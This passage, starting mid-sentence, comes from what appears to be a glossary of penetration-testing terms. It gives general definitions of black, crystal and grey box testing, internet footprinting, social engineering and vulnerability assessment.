network go untested and may lead to a false sense of security. Attacks are carried out as covertly as
possible. Once the attacks are observed and reported by the target organization, black box testing ceases.
Black box testing is also referred to as “no knowledge testing.” It is the most unreliable form of
penetration testing.

Crystal Box Penetration Test:
Crystal Box testing is used when the organization desires to test internal or external network security from
the perspective of an attacker with full and complete knowledge of the organization, similar to the knowledge
possessed by an administrator. This knowledge normally includes passwords for routers, firewalls and IDS
Systems, network topology, machine configurations and other information that an IT administrator would
possess. As many discovered vulnerabilities as possible are exploited within the timeframe specified in the
engagement letter. Attacks may be carried out overtly or covertly, as the organization desires. Crystal box
testing provides the most thorough assessment of the security posture of the network, in that multiple
attack avenues are pursued with detailed knowledge of the organization. Crystal box testing is also referred
to as “full knowledge testing” or “white box testing.”

Grey Box Penetration Test:
Grey Box testing is used when the organization desires to test internal or external network security from
the perspective of an attacker with only limited knowledge of the organization, similar to the knowledge
possessed by a non-IT employee. This knowledge normally includes machine names, shared folder names, IP
addresses, naming conventions and other information that a normal user with no special access would know
about the target organization. As many discovered vulnerabilities as possible are exploited within the
timeframe specified in the engagement letter. Attacks may be carried out overtly or covertly, as the
organization desires. Grey box testing assures a more thorough assessment of the security posture of the
network, in that several possible attack avenues are pursued. Grey box testing is also referred to as
“partial knowledge testing.”

Internet Foot Printing:
Internet foot printing uses the Internet to search for information in the public domain that could assist an
attacker in gaining access to the target’s network. While some information placed in the public domain is
required by law, regulation, or to assist in conducting business, excess information in the public domain
could result in an attacker gaining enough knowledge to conduct logical, physical or social engineering
attacks against the target. Expected results of Internet Footprinting are: location addresses, business
hours, telephone and fax numbers, contact names and e-mail addresses; partners; merger/acquisition news;
privacy and security policies in place; links to other Web servers; employee names and information;
networking equipment used; Web pages using input forms, assigned IP address ranges and Points of Contact,
etc.

Penetration Test:
The objective of penetration testing is to exploit discovered vulnerabilities to demonstrate that specific
vulnerabilities, present in the organization’s network, can be used to compromise network security. It uses
intrusion techniques, identical or similar to methods used by attackers to breach network security, collect
data and elevate the attacker’s privileges within the network. It can also reveal the extent to which an
organization’s security incident response capability is alerted by observing the organization’s response to
attack methodologies.

Physical Penetration Testing:
See Social Engineering.

Social Engineering:
Also called physical penetration testing. Social Engineering includes “successful or unsuccessful attempts
to influence a person(s) into either revealing information or acting in a manner that would result in
unauthorized access, unauthorized use, or unauthorized disclosure to/of an information system, network or
data” using human-based or computer-based techniques. In other words, using deception to con someone into
providing information or access they would not normally have provided. It’s the “human side” of breaking
into a network and preys on the qualities of human nature, such as the desire to be helpful, the tendency to
trust people and the fear of getting in trouble. Social engineering can also include the practices of
“dumpster diving” (searching the target’s refuse for useful information) and “shoulder surfing” (obtaining
passwords by surreptitiously watching a user type in their password).

Vulnerability Assessment:
The objective of vulnerability testing is to discover possible attack vectors that can be used to compromise
the target network. It is a systematic examination of an information system or product to determine the
adequacy of security measures, identify security deficiencies, provide data from which to predict the
effectiveness of proposed security measures, and confirm the adequacy of such measures after implementation.
